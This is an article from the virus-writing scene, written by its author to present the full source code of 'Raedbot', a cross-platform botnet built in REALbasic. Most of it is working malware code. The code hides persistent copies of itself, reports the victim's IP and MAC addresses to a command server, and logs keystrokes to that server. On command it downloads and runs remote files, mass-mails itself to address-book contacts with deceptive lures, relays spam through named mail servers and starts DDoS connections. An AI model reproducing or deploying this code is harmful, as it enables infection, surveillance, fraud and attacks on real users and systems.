
            T h e   R a e d b o t  b o t n e t  m e c h a n i s m e 

                          ( On 3 differents OS )


====> Presentation


(c) Ag_Raed ,Tunisia on april 2009 
 x-ag_raed-x[ at ]hotmail[ dot ]fr

// Coded for the first time in REALbasic 
// Projects can be compiled in 3 different OS : Win32
                                                 Mac OS X  
                                                 Linux  
     
 
  // REALbasic is a cross-platform software development environment for creating software for Mac, Windows and Linux.
    Right now it is a software for creating malwares !
    to start , this is an article explaining the Raedbot botnet source code and its mechanism ,
    the compiled file can run in 3 different OS ( Win32 , Linux and Mac OS X ) , see built_image
    and we can say that is the first Mac OS X Botnet 

 

Commands are :

talk phrase : Prounounce text with  computer�s speech synthesizer  ( Win32 and Mac OS only ) , exemple : talk bsili

beep : Beep !

log.start : Start keylogger

log.stop : Stop keylogger

update url : Download file from remote http server and execute it , exemple : update http:\\myserver.tn\myfile.app

navigate url : Open a site with the default machine navigator , exemple : navigate www.tounes_bi5air.tn

spam.on : Get Mac os address book emails and spam them ( Only Mac OS X )

spam.off : Stop spamming

ddos.on ; Start ddos attacke on remote http target

ddos.off ! Stop the ddos attacke
 
===== > source Code , 
        see REALbasic_project i and REALbasic_project_2 images

EVENT HANDLERS

__Sub Open()



  //Backdoor.OSX.Raedbot.C ,Reconnaissance Worm/Bot ( There are also the other projects of the other versions : A , B , B+ , B++ ,) 
  //(c) Ag_Raed , Tunisia on january 2009



  
  Dim myfile, SYSfldr , StartUp  As FolderItem
  dim data ,pass ,datasend as string

  myfile = app.ExecutableFile // our bot file
  
  SYSfldr =SpecialFolder.System // We get the default system dir
  
  if  SYSfldr <> Nil and SYSfldr.exists then
    myfile.CopyFileTo SYSfldr // Be sure it exists and copy our bot in that dir
    StartUp =SpecialFolder. StartupItems
    myfile.CopyFileTo StartUp // Also we copy our bot in the default startup  dir 
  end if

for i = VolumeCount - 1 DownTo 0
    myfile.CopyFileTo(Volume(i)) // Copy our bot to every disque detected
  next
  
  SYSfldr.Child(myfile.name).Name = "applesystem" //Renaming our bot in system dir
  
  SpecialFolder.StartupItems.Child(myfile.name).name = "systemupdate" // And in start up dir
  SYSfldr.Child(myfile.name).Locked = True // We lock the file , no possible deletion , no possible renaming
  SYSfldr.Child(myfile.name).Permissions = 1 // No possible reading 
  SYSfldr.Child(myfile.name).Visible  = False // We set our bot invisible from user
  
  
  TCPSocket1.Address =  "myhost.myserver.tn"
  TCPSocket1.Port = 19991
  TCPSocket1.Connect // Contacting server
  
  
  
  Dim i as Integer
  dim targets as string
  Dim book as AddressBook
  book=System.AddressBook
  Dim Contacts() as AddressBookContact
  Contacts=book.Contacts // Access Mac OS X address book
  For i =0 to Ubound(Contacts) 
    targets =  Contacts(i).EmailAddresses // Read all address and copy them into string
  Next
  
  
 ---------- // The mass mail spreading mechanisms
                // Algo_1 is the first word (hi , hello ...)
                //  ALgo_2 is secone word ( friend  , dude , man...)
                // Algo_3 is the third ( waassuup , ...)
  
  Dim mail as EmailMessage 
  Dim file as EmailAttachment
  Dim s,email_targets ,Algo_1 ,Algo_2 ,Algo_3,Algo_spr , consom , voyl,Algo_Phrase as String
  dim r as new random
  dim randomnumber,randomnumber2,randomnumber3,randomnumber4,randomnumber5 as integer
  
  randomnumber = r.inrange(1,7) // We select a number between 1 and 7
  
  select case randomnumber // Select case random number  7 > randomnumber > 1
  case 1
    Algo_1  =  "Hi "
  case 2 
    Algo_1 = "Hey" 
  case 3
    Algo_1 = " Hello" 
  case 4
     Algo_1 ="y0 " 
  case 5
    Algo_1 = "Yo" 
  case 6
    Algo_1 = "Selem alaykom" 
  case 7
    Algo_1 = "Friend ! :) , " 
  end select
  
  
  randomnumber2 = r.InRange(1,5)
  
  select case randomnumber2
  case 1
    Algo_2 = "  friend "
  case 2
    Algo_2 = "  dude" 
  case 3
    Algo_2 = "  man"
  case 4
    Algo_2 = "  you"
  case 5
    Algo_2 = "  fucky :D , just kidding,so"
  end select
  
  
  randomnumber3 = r.InRange(1,7)
  
  Select Case randomnumber3
  case 1
    Algo_3 = "  wassup ?"
  case 2
    Algo_3 = "  how it is going "
  case 3
    Algo_3 = "  I missed you ! ^^"
  case 4
    Algo_3 = "  what is up there? "
  case 5
    Algo_3 = "  what is new ?"
  case 6
    Algo_3 = "  how are you" 
  case 7
    Algo_3 = "  sup?"
  end Select
  
  randomnumber4 = r.InRange(1,18 )
  
  
  Select case randomnumber4
  case 1
    consom = "z"
  case 2
    consom = "r"
  case 3
    consom = "t"
  case 4
    consom = "p"
  case 5
    consom = "q"
  case 6
    consom = "s"
  case 7
    consom = "d"
  case 8
    consom = "f"
  case 9
    consom = "g"
  case 10
    consom = "x"
  case 11
    consom = "j"
  case 12
    consom = "k"
  case 13
    consom = "l"
  case 14
    consom = "m"
  case 15
    consom = "c"
  case 16
    consom = "v"
  Case 17
    consom = "b"
  case 18
    consom = "n"
  end select
  
  randomnumber5 = r.InRange(1, 8)
  
  
  Select case randomnumber5
  case 1
    voyl = "a"
  case 2
    voyl = "e"
  case 3
    voyl = "y"
  case 4
    voyl = "u"
  case 5
    voyl = "i"
  case 6
    voyl = "o"
  case 7
    voyl = "h"
  case 8
    voyl = "w"
  end Select



   
  Algo_Phrase = consom+voyl+consom+voyl+consom+voyl+consom+voyl+" "+consom+voyl+consom+voyl+consom+voyl+consom+voyl+"." 

// With voyl and consome , we generate a general phrase , of course with different lettres exemple of generated phrase : kefisole fitave .
// and with this smart mass mail spreader , the messages sent to emails address are always differents  
  
  randomnumber = r.inrange(1,11)
  
  select case randomnumber
  case 1
    Algo_spr =  "Traducting and decrypting message .... : 1010101101010 "
  case 2
    Algo_spr = "Traducting and decrypting message .... :Sir , Your Text !"
  case 3
    Algo_spr = "Traducting and decrypting message .... :Error For Sending ,It Is Important to Get Your Data "
  case 4
    Algo_spr ="Traducting and decrypting message .... :Check It , new OS update"
  case 5
    Algo_spr = "Traducting and decrypting message .... :Crypted Message Has Been sent as An Attachement , To Chek Your Message , Chek Your Attachement"
  case 6
    Algo_spr = "Traducting and decrypting message .... :Check , an update for your new operating system "
  case 7
    Algo_spr ="Traducting and decrypting message .... :Your Identidie Has Been ....Chek Attchement For More Information"
  case 7
    Algo_spr = "Traducting and decrypting message .... :You Has Been Comprimased , updating tools are as an attachement !"
  case 8
    Algo_spr = "Traducting and decrypting message .... :Credi Money Has Been Sent As A Binary File for thanks for the updating, Chek"
  case 9
    Algo_spr = "Traducting and decrypting message .... :New  update tools "
  case 10.
    Algo_spr = "Traducting and decrypting message .... :Chek your update application !"
  case 11
    Algo_spr = " Traducting and decrypting message .... :Your information was ..."
  end select
  
  SMTPSocket1.address = "mail.mySMTPServer.com"
  SMTPSocket1.port = 25 // We connect to a SMTP server 
  
  
  mail = New EmailMessage
  mail.fromAddress = "AppleFu"+consom+voyl+"cker@mail."+consom+voyl // also random source address
  mail.Subject = " For Mac OS X ! :(If you are not on Mac please transfer this mail to a Mac and sorry for our fault :)"+ALgo_1+Algo_2+Algo_3+Algo_Phrase+Algo_Phrase+Algo_spr+" To block this mail next time , you should  disable Mail Option , check in the attachement application for more help , Thanks again !"
  
  // The emails added should be separated by comma " , "
  email_targets = ReplaceAll(email_targets,",",Chr(13)) 
  For i = 1 to CountFields(email_targets,Chr(13))
    mail.addRecipient Trim(NthField(email_targets,Chr(13),i)) // We add our collected email address
  next
  
  file = New EmailAttachment 
  file.loadFromFile myfile 
  mail.attachments.append file  // we load a bot copy to the mail attachement
  
  
  SMTPSocket1.messages.append mail // and charge all messages 
  SMTPSocket1.SendMail // sending mails
  
  
  

 

CONTROLS
*** TCPSocket1 Event 

 _Sub Connected() // // Occurs when the  connection has been established with the remote server.

  dim rnd as integer
  Dim r as New Random
  dim data ,datasend,pass,mac,ip,subnet as string
  Dim n as NetworkInterface
  n = System.GetNetworkInterface( )


  mac = n.MACAddress // get machine Macaddress 
  ip = n.IPAddress // ip address
  subnet = n.SubnetMask // and subnet
  tcpsocket1.write "Boted and infected by Raedbot "
  TCPSocket1.Write "Incoming connection :" 
  TCPSocket1.write "Ip = "+ ip // send to the server ip address
  tcpsocket1.flush
  TCPsocket1.write "      ,      MacAdress = " +mac // macaddrress
  tcpsocket1.flush
  TCPSocket1.write "      ,      Subnet ="+ subnet // and subnet 


 _Sub DataAvailable() // Occurs when additional data from the server  has come into the internal receive buffer.

  dim data ,pass ,datasend ,url ,myext as string
  dim counter as integer
  dim dest as folderitem
  dest = specialfolder.system // System dir
  data = tcpsocket1.readall // We read our data and put it into a string
  timer1.enabled = false 
  timer2.enabled = false
  if inStr(data,"talk" ) = 1 then // Exemple : talk maryam  , it prounounce the word " maryam"
    speak mid(data,6) // Command " talk " was detected : Prounounce text ( mid(data,6) : return the text placed after the 6 first charachter , mean the after "talk" ) with  computer�s speech synthesizer  
  end if
  if instr(data ,"beep" ) = 1 then
    beep // Command "beep" was detected : beep !
  end if
  if instr(data , "log.start" ) = 1 then 
    timer1.enabled = true // Command " log.start " was detected :  start the keylogger
    tcpsocket1.write " keylogger started ! " // send message to the master : keylogger started !
  end if 
  if instr(data,"log.stop") = 1 then
    timer1.enabled = false // Command "log.stop" was detected : stop the keylogger
    tcpsocket1.write " log stopped" // send message to the master : keylogger stopped !
  end if
  if instr(data ,"update") = 1 then // Update means , download file from http server and execute it (only executable file) , exemple update http://myserver.tn/file.app
    url = mid(data, 8) // got the url , means got after the update word 
    myext = nthField(app.Executablefile.name,".",2) // get bot extension
    TCPSocket1.write " Updating from " +url+"..."  // send message to the master : Updating from URL .....
    HttpSocket1.get url,dest.child("Ru-9."+myext) //  downloading remote file and saving it as Ru-9.botextension
  end if
  if instr(data,"navigate")  = 1 then // navigate , open a site with the default navigator  , exemple : navigate http://govporno.tn
    showurl mid(data,10) 
  end if
  if instr(data,"spam.on") = 1 then // spam.on , start spamming ( with SMTPSocket2 )
    timer2.enabled = true // enable the spamming 
    TCPSocket1.Write " Spam Reactor was turned on!" // message master ; SPam Reactor was turned on
  end if 
  if instr(data,"spam.off") = 1 then // Stop spamming
    timer2.Enabled = false // disable the spamming
    TCPSocket1.write "Spam Reactor was turned off !"
  end if
  if instr(data,"ddos.on") = 1 then  // ddos.on , start ddos attacke on a specific HTTP target ( With TCPSocket2 : different socket )
                                     // connect to http server , read each byte of bot file , crypte it with MD5 and keep sending it  
    Dim myFile As FolderItem
    Dim mySize As Integer
    Dim Mybot  As  binarystream
    Dim myCode As String
    
    myFile =app.ExecutableFile 
    mySize = myFile.length 
    Mybot = myFile.OpenAsBinaryFile(false) // Open bot file
    Mybot.LittleEndian = false
    myCode  = Mybot.Read(mySize) // read bot file 
    TCPSocket1.write "Ddos Reactor on ! :Starting DDos attacke on " + mid(data,9)
    TCPSocket2.Address = mid(data,9) // our specific http target
    TCPSocket2.Port = 80
    TCPSocket2.connect
    TCPSocket2.Write md5(myCode)+"Die fucker " // I c it is clear ! :)
    return
  end if 
  if InStr(data,"ddos.off") = 1 then // Commabnd " ddos.off" detected : disconnect from target server
    TCPSocket2.disconnect
    TCPSocket1.write "Ddos Reactor off : Disconnected from server , ddos attacke stopped !"
  end if 


 _Sub Error() //An error occurred when connecting to our remote server  ( where got commands from central server : with TCPSOcket1 )

  TCPSocket1.port = 9999 // if the bot failed contacting the central server , it listen the port 9999
  TCPSocket1.listen 
  system.DebugLog ":Error contacting server , port 9999 was listened , (c) High Botnet Coding Technologie !!" // 
  
// system.DebugLog means writing message in the folowing ways : depending of course of specific OS

_Sub SendComplete(UserAborted as Boolean) // We dont need it

_Sub SendProgress(bytesSent as Integer ,bytesLeft as Integer) As Boolean // not either 

*** TCPSocket2 Event // (Used for ddos ..)
_Sub Connected()

  TCPSocket1.Write "Connected , begining the attacke..."

_Sub DataAvailable()
// Once data was received from the remote http server , we redirect it to the master ( means me of course :) )

  TCPSocket1.Write "Some data was received from remote target server , data will be redirected automaticly  for you (Warning this attacke can be used against you , stop ddos reactor ! "
  TCPSocket1.write TCPSocket2.ReadAll

_Sub Error()

TCPSocket1.Write "Error for contacting remote target server!"

*** SMTPSocket1 Event (Used for mass mail spreader, not realy important)

_Sub ConnectionEstablished(greeting as string)

system.DebugLog " With Mass Mail Spreader :  Connection established with remote smtp server"

__Sub Error()

system.DebugLog "With Mass Mail Spreader :Error !!"

__Sub MailSent()

system.DebugLog " With Mass Mail Spreader : Mail sent !!"

__Sub MessageSent(Email as EmailMessage)

System.DebugLog "With Mass Mail Spreader : Message sent"

__Sub SendProgress(bytesSent as Integer , bytesLeft as integer) As Boolean

system.DebugLog "With Mass Mail Spreader : Spreading ...!"

__Sub ServerError(ErrorID as Integer , ErrorMessage as string , Email as EmailMessage)

System.DebugLog "With Mass Mail Spreader : Erro during establishing connection with remote smtp server"

*** SMTPSocket2 Event (Used for Spamming .. , By Timer2 )

__Sub ConnectionEstablished(greeting as string)

tcpsocket1.Write " Connected to smtp server !"

__Sub Error()

tcpsocket1.write " error fucker (smtp server connection)"

__Sub MailSent()

tcpsocket1.write "Mail sent succesfuly!"

__Sub MessageSent(Email as EmailMessage)

tcpsocket1.write "Message sent succesfuly!"

__Sub SendProgress(bytesSent as Integer , bytesLeft as integer) As Boolean

tcpsocket1.write "Spamming..."

__Sub ServerError(ErrorID as Integer , ErrorMessage as string , Email as EmailMessage)

  tcpsocket1.Write "Error from smtp server"
  TCPSocket1.Write str(ErrorID)

*** HTTPSocket1 Event ( Used for downloading files ....with the command : update url)

__Function AuthenticationRequired(header as internetHeader,ByRef name as string , ByRef password as string) As boolean

tcpsocket1.Write "Need authentification fucker!"

__Sub Connected() // Once connected to the remote http server 

tcpsocket1.write "Connected !"
__Sub DownloadComplete(url as string, httpStatus as integer , headers as internetheaders,file as folderitem) // Once downloading file was completed , we execute it


  dim dest as folderitem
  dim myext as string 
   myext = nthField(app.Executablefile.name,".",2)

  dest =SpecialFolder.System

  TCPSocket1.write " Transmission completed , executing file..."

  dest.child("Ru-9."+myext).launch // we launch the downloaded file

__Sub Error(code as integer) // error downloading ..

tcpsocket1.write " Error fucker!("+str(code)+")"

__Sub HeaderReceived(headers as internetheaders, httpStatus as integer)


__Sub PageReceived(url as string , httpStatus as integer, headers as internetHeaders , content as string) // the server's page was received , let's let know the user

TCPSocket1.Write "Got the remote page ."

__Sub receveProgress(bytesReceived as integer , totalBytes as integer , newData as string) // Once the download beginns

  TCPSocket1.Write " Receiving byte : Downloading file...."
  TCPSocket1.Write "Downloading :Reception byte "+str(bytesReceived)+"/"+str(totalBytes)" // we tell to master how many byte was received and about the rest of byte 

__Function SendProgress(bytesSent as integer , bytesLeft as Integer ) As Boolean // we dont need it


*** Timer1 (Used for Keyloging ,with the command : log.start ) 
__Sub Action()
  
  If Keyboard.AsyncKeyDown(&h00) then
    TCPSocket1.poll
    TCPSocket1.write "a" // if the letter " a " was detected  , we message user : a ( so easy , so simple ) :) , same in the next codes 
  end if
  if  Keyboard.AsyncKeyDown(&h0b)  then
    TCPSocket1.poll
    TCPSocket1.write "b"
  end if
  if  Keyboard.AsyncKeyDown(&h08) then
    TCPSocket1.poll
    tcpsocket1.write "c"
  end if
  if  Keyboard.AsyncKeyDown(&h02) then
    TCPSocket1.poll
    tcpsocket1.write "d"
  end if
  if  Keyboard.AsyncKeyDown(&h0E) then
    TCPSocket1.poll
    tcpsocket1.write "e"
  end if
  if  Keyboard.AsyncKeyDown(&h03) then
    TCPSocket1.poll
    tcpsocket1.write "f"
  end if
  if  Keyboard.AsyncKeyDown(&h05) then
    TCPSocket1.poll
    tcpsocket1.write "g"
  end if
  if  Keyboard.AsyncKeyDown(&h04) then
    TCPSocket1.poll
    tcpsocket1.write "h"
  end if
  if  Keyboard.AsyncKeyDown(&h22) then
    TCPSocket1.poll
    tcpsocket1.write "i"
  end if
  if  Keyboard.AsyncKeyDown(&h26) then
    TCPSocket1.poll
    tcpsocket1.write "j"
  end if
  if  Keyboard.AsyncKeyDown(&h28) then
    TCPSocket1.poll
    tcpsocket1.write "k"
  end if
  if  Keyboard.AsyncKeyDown(&h25) then
    TCPSocket1.poll
    tcpsocket1.write "l"
  end if
  if  Keyboard.AsyncKeyDown(&h2E) then
    TCPSocket1.poll
    tcpsocket1.write "m"
  end if
  if  Keyboard.AsyncKeyDown(&h2D)  then
    TCPSocket1.poll
    tcpsocket1.write "n"
  end if
  if  Keyboard.AsyncKeyDown(&h1F)  then
    TCPSocket1.poll
    tcpsocket1.write "o"
  end if
  if  Keyboard.AsyncKeyDown(&h23) then
    TCPSocket1.poll
    tcpsocket1.write "p"
  end if
  if  Keyboard.AsyncKeyDown(&h06) then
    TCPSocket1.poll
    tcpsocket1.write "q"
  end if
  if  Keyboard.AsyncKeyDown(&h0F) then
    TCPSocket1.poll
    tcpsocket1.write "r"
  end if
  if  Keyboard.AsyncKeyDown(&h01) then
    TCPSocket1.poll
    tcpsocket1.write "s"
  end if
  if  Keyboard.AsyncKeyDown(&h11) then
    TCPSocket1.poll
    tcpsocket1.write "t"
  end if
  if  Keyboard.AsyncKeyDown(&h20) then
    TCPSocket1.poll
    tcpsocket1.write "u"
  end if
  if  Keyboard.AsyncKeyDown(&h09) then
    TCPSocket1.poll
    tcpsocket1.write "v"
  end if
  if  Keyboard.AsyncKeyDown(&h0D)   then
    TCPSocket1.poll
    tcpsocket1.write "d"
  end if
  if  Keyboard.AsyncKeyDown(&h07) then
    TCPSocket1.poll
    tcpsocket1.write "x"
  end if
  if  Keyboard.AsyncKeyDown(&h10) then
    TCPSocket1.poll
    tcpsocket1.write "y"
  end if
  if  Keyboard.AsyncKeyDown(&h06) then
    TCPSocket1.poll
    tcpsocket1.write "z"
  end if
  if  Keyboard.AsyncKeyDown(&h52) then
    TCPSocket1.poll
    tcpsocket1.write "0"
  end if
  if  Keyboard.AsyncKeyDown(&h53) then
    TCPSocket1.poll
    tcpsocket1.write "1"
  end if
  if  Keyboard.AsyncKeyDown(&h54) then
    TCPSocket1.poll
    tcpsocket1.write "2"
  end if
  if  Keyboard.AsyncKeyDown(&h55) then
    TCPSocket1.poll
    tcpsocket1.write "3"
  end if
  if  Keyboard.AsyncKeyDown(&h56) then
    TCPSocket1.poll
    tcpsocket1.write "4"
  end if
  if  Keyboard.AsyncKeyDown(&h57) then
    TCPSocket1.poll
    tcpsocket1.write "5"
  end if
  if  Keyboard.AsyncKeyDown(&h58) then
    TCPSocket1.poll
    tcpsocket1.write "6"
  end if
  if  Keyboard.AsyncKeyDown(&h59) then
    TCPSocket1.poll
    tcpsocket1.write "7"
  end if
  if  Keyboard.AsyncKeyDown(&h5B)  then
    TCPSocket1.poll
    tcpsocket1.write "8"
  end if
  if  Keyboard.AsyncKeyDown(&h5C)  then
    TCPSocket1.poll
    tcpsocket1.write "9"
  end if


*** Timer2 (Used for Spamming , got address and spamming ... , with spam.on) // same with the spreading but with random SMTP server and random source mail :)
__Sub Action()
  
  Dim myfile, SYSfldr , StartUp  As FolderItem
  dim data ,pass ,datasend as string
  
  myfile = app.ExecutableFile
  Dim i as Integer
  dim targets as string
  Dim book as AddressBook
  book=System.AddressBook
  Dim Contacts() as AddressBookContact
  Contacts=book.Contacts
  For i =0 to Ubound(Contacts)
    targets =  Contacts(i).EmailAddresses
  Next
  
  
  
  
  Dim mail as EmailMessage
  Dim file as EmailAttachment
  Dim s,subject,email_targets,server,src_mail as String
  dim r as new random
  dim randomnumber,randomnumber2,randomnumber3 as integer
  
  randomnumber = r.inrange(1,11)
  
  select case randomnumber
  case 1
    subject =  "Hi , Chek"
  case 2
    subject = "Sir , Your Text !"
  case 3
    subject = "Error For Sending ,It Is Important to Get Your Data "
  case 4
    subject ="Chek It "
  case 5
    subject = "Crypted Message Has Been An Attachement , To Chek Your Message , Chek Your Attchement"
  case 6
    subject = "Check"
  case 7
    subject ="Your Identidie Has Been ....Chek Attchement For More Information"
  case 7
    subject = "You Has Been Comprimased , Chek !"
  case 8
    subject = "Credi Money Has Been Sent As A Binary File , Chek"
  case 9
    subject = "New porn tools "
  case 10.
    subject = "Chek your XXX application !"
  case 11
    subject = " Your information was ..."
  end select
  
  randomnumber2 = r.InRange(1,12)
  
  Select Case randomnumber
  case 1
    server =  "smtp.9online.fr"
  case 2
    server = "mail.club-internet.fr"
  case 3
    server = "mail.diligo.fr"
  case 4
    server = "smtp.free.fr "
  case 5
     server ="smtp.infonie.fr"
  case 6
    server = "smtp.libertysurf.fr"
  case 7
    server ="smtp.nerim.fr"
  case 8
    server = "mail.cybercable.fr"
  case 9
    server = "mail.oreka.com"
  case 10
    server = "smtp.wanadoo.fr"
  case 11
    server = "mail.worldnet.fr"
  case 12
    server = "smtp.laposte.net"
  end Select
  
  
  randomnumber3 = r.InRange(1,6)
  select case randomnumber3
  case 1
    src_mail = "br@fh.tn"
  case 2
    src_mail = "av@av.tn"
  case 3
    src_mail ="fucker@fuck.fu"
  case 4
    src_mail = "ser@jhfd.it"
  case 5
    src_mail = "Ma@ry.am"
  case 6
    src_mail = "apple@service.tn"
  end Select
  
  SMTPSocket2.address = server
  SMTPSocket2.port = 25
  
  
  mail = New EmailMessage
  mail.fromAddress =src_mail
  mail.subject = subject
  
  
  email_targets = ReplaceAll(email_targets,",",Chr(13))
  For i = 1 to CountFields(email_targets,Chr(13))
    mail.addRecipient Trim(NthField(email_targets,Chr(13),i))
  next
  
  file = New EmailAttachment
  file.loadFromFile myfile
  mail.attachments.append file
  
  
  SMTPSocket2.messages.append mail
  SMTPSocket2.SendMail






==== > Greeting :

Metalkid : The best guy ever met before  my best cyber friend , the problem is i dont know how to thank you :) | Peace on you

Synge : My first vx friend :)  All the thanks for everything you did for me , thanks to still thinking i am gay :D and sorry about Locita joke :D

izee : thanks for your support and help :)

Genetix : Thanks for your help ! :)

Drwh4x : Thanks also for some help! :)

Dr3f : Thanks for your suggestions but i dont think i am going to fuck up the world one day ;) 


And of course thanks to all ppl on #vxcode , #virus and #vxers @ undernet 

// The REALbasic programming language is like visualbasic , you are so lucky if you already code in VB6 ,
   i learned it in a few days and found it so useful for coding malwares , specialy for Mac OS X :) ^^
   To download REALbasic + serial key , search on google for REALbasic torrent , there is a reference wich explain you clearly all the language's bases
   
 
// The exe compiled file ( on WIN32 ) was detected by F-Secure as Hack-Tool:Win32/MyBackdoor.A
 
// I have a bad english and this article could contains some vocabulary errors 
   so you can email me ( x-ag_raed-x[ at ] hotmail [ dot ] fr ) or join #vxcode , #virus or #vxers to tell me how much i am a fucker ! :)


  
  
  